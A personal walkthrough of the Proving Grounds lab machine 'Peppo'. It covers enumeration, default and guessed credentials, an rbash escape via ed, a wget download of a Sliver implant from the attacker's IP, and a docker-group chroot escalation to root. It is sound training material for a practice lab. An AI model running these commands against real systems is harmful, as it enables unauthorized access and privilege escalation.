Peppo - Writeup - Konstantinovitz

## Enumeration ### 10000 ![[Pasted image 20250324182506.png]] ``` 10000/tcp open snet-sensor-mgmt? |_auth-owners: eleanor | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | HTTP/1.1 400 Bad Request | Connection: close | FourOhFourRequest: | HTTP/1.1 200 OK | Content-Type: text/plain | Date: Mon, 24 Mar 2025 16:42:26 GMT | Connection: close | Hello World | GetRequest: | HTTP/1.1 200 OK | Content-Type: text/plain | Date: Mon, 24 Mar 2025 16:42:19 GMT | Connection: close | Hello World | HTTPOptions: | HTTP/1.1 200 OK | Content-Type: text/plain | Date: Mon, 24 Mar 2025 16:42:20 GMT | Connection: close |_ Hello World 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : ``` ### WAPP - 8080 HTTP - Runs "Redmine" (known application) - Powered by Redmine © 2006-2020 Jean-Philippe Lang - contains a csrf-token in html header?? ``` | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: D316E1622C58825727E7E4E6C954D289 | http-robots.txt: 4 disallowed entries |_/issues/gantt /issues/calendar /activity /search |_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31) |_http-title: Redmine ``` - default creds? - `admin:admin` - much love, need to set new password (password expired) - new password: `password` - user was created on `06/01/2020` () ![[Pasted image 20250324175735.png]] **Path enumeration** ![[Pasted image 20250324180458.png]] http://192.168.226.60:8080/settings?tab=repositories ![[Pasted image 20250324212749.png]] ![[Pasted image 20250324212903.png]] - attempting to create a new project at http://192.168.226.60:8080/projects/new causes a timeout... - can create new tracker: http://192.168.226.60:8080/trackers ### SSH ... ## Foothold - took a hint here: `Be sure to fully enumerate all TCP ports. One of the services will reveal a username. Try guessing their password.` - apparently we should bruteforce ssh lol - ended up looking at the solution here, apparently we need to login with `eleanor:eleanor` --- ## Privesc - we authenticate and see that we have mail? - we are stuck in restricted `rbash` ### Breaking out of `rbash` ``` eleanor@peppo:~$ export -p declare -x HOME="/home/eleanor" declare -x LANG="en_US.UTF-8" declare -x LOGNAME="eleanor" #================================================ declare -x MAIL="/var/mail/eleanor" # <========== #================================================ declare -x OLDPWD declare -rx PATH="/home/eleanor/bin" declare -x PWD="/home/eleanor" declare -rx SHELL="/bin/rbash" declare -x SHLVL="1" declare -x SSH_CLIENT="192.168.45.231 52096 22" declare -x SSH_CONNECTION="192.168.45.231 52096 192.168.191.60 22" declare -x SSH_TTY="/dev/pts/0" declare -x TERM="xterm-256color" declare -x USER="eleanor" declare -x XDG_RUNTIME_DIR="/run/user/1000" declare -x XDG_SESSION_ID="3" ``` We note that `/home/eleanor/bin` is on path and we can list the files in it: ```sh eleanor@peppo:~$ echo $PATH /home/eleanor/bin eleanor@peppo:~$ ls bin chmod chown ed ls mv ping sleep touch ``` We can leverage `ed` to read a file now: ``` eleanor@peppo:~$ ed local.txt 33 ,p 1f6226d397240b2f5ea28209e535557e ``` `ed` is listed [gtfobins.com](https://gtfobins.github.io/gtfobins/ed/) and can be used to breakout from restricted environments <3 ``` eleanor@peppo:~$ ed !/bin/sh $ whoami /bin/sh: 1: whoami: not found $ pwd /home/eleanor ``` we're still missing access to most of the stanard unix tooling, so let's attempt to set a more... inclusive `PATH` environment: ``` $ export PATH=$PATH:/user/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin $ echo $PATH /home/eleanor/bin:/user/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin $ wget wget: missing URL ``` We can now go ahead and attempt to upgrade our access by downloading a sliver implant: ``` wget http://192.168.45.231:445/peppo -o /tmp/implant ``` The connection times out.. let's do some manual enum shall we? **Active Procs** ``` # we're stuck inside of docker? root 486 0.0 2.1 571420 44852 ? Ssl 06:06 0:00 /usr/bin/containerd root 487 0.0 3.9 525716 81576 ? Ssl 06:06 0:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock # we saw this in the home dir, seems it was owned by root?? eleanor 463 0.0 1.4 564884 28856 ? Ssl 06:06 0:00 /usr/bin/node /home/eleanor/helloworld/index.js # likely the redmine app 999 1090 0.0 5.9 304292 122808 ? Ssl 06:06 0:01 /usr/local/bin/ruby bin/rails server -b 0.0.0.0 ``` ### Nodejs application Source file contents ``` $ cat ./helloworld/index.js const http = require('http'); const hostname = '0.0.0.0'; const port = 10000; http.createServer((req, res) => { res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('Hello World\n'); }).listen(port, hostname, () => { console.log('Server running...'); }); ``` Open ports: ``` $ ss -tulnp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port tcp LISTEN 0 128 *:10000 *:* users:(("node",pid=463,fd=18)) tcp LISTEN 0 15 *:113 *:* tcp LISTEN 0 128 *:22 *:* tcp LISTEN 0 128 :::8080 :::* tcp LISTEN 0 128 :::22 :::* tcp LISTEN 0 128 :::5432 :::* ``` We attempt to kill the proc a couple of times. We observe that it restarts with a new `PID`. This indicates that some supervisory process is restarting it: ![[Pasted image 20250330134603.png]] ``` $ systemctl | grep node kmod-static-nodes.service loaded active exited Create list of required static device nodes for the current kernel node.service loaded active running Node.js Example Server ``` ``` $ cat /etc/systemd/system/node.service [Unit] Description=Node.js Example Server [Service] ExecStart=/usr/bin/node /home/eleanor/helloworld/index.js WorkingDirectory=/home/eleanor/helloworld Restart=always RestartSec=10 StandardOutput=syslog StandardError=syslog SyslogIdentifier=nodejs-example User=eleanor Group=eleanor Environment=NODE_ENV=production PORT=10000 [Install] WantedBy=multi-user.target ``` So it turned out this was another dandy rabbit hole.... ### Docker Privesc ``` $ id uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker) ``` We observe that we're included in the `docker` group. Having a look at https://gtfobins.github.io/gtfobins/docker/ we attempt a common docker privesc: ``` docker run -v /:/mnt --rm -it redmine chroot /mnt sh $ docker run -v /:/mnt --rm -it redmine chroot /mnt sh # whoami root ``` --- ## Lessons Learned - Proving grounds will throw you some fkd rabbit holes - was so sure Redmine had to be the entry that it made be blind to the rest - was also pretty sure that SSH bruteforcing was not gonna be the way in... - On offsec boxes, always attempt `username:username` - Don't rely on fancy attack paths or payloads - Practice manual privesc more - Practice docker more - Focus on breadth initially, rather than going down rabbit holes - Stick with the timer, pivot after 30 minutes.